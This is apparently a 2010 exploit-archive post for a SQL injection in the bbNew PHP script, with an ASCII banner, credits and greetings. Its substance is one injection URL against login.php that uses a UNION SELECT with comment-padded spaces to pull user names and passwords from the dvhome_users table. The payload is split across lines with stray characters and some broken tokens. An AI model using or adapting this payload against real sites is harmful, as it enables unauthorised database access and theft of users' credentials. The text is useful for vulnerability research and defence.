# Exploit Title: bbNew admin.php SQL Injection # Date: 17.02.2010 # Author: Easy Laster # Tested on: windows xp ######################################################################## ##bbNew admin.php SQL Injection ## ######################################################################## ######################################################################## ## _ _ _ _ ## ##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_ ## ##| _| -_| .'| |___| | | _| -_| _| | -_| _| ## ##|_| |___|__,|_|_|_| |_|_|_|_| |___|_| |_|_|___|_| ## ## ## ######################################################################## ########################################################################## #Script: bbNew admin.php SQL Injection # #Vulnerabilities [ SQL Injection ] # #Language: [ PHP ] # #Download: [ buy this script ] # #Founder: [ ea$y laster ] # #Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ] # #[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=- silent vapor] # #Price: [ Commercial License EUR unknown # ############################################################################## http://www.target.com/path/login.php?operate=login&input_name='/**/union/ # **/select/**/null,null,name,null,password,null,null,null,null,n ull,null,null# ,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null # ,null,null,null,null,null,null,null,null,null,null/**/from/**/dvhome_users-- # ##############################################################################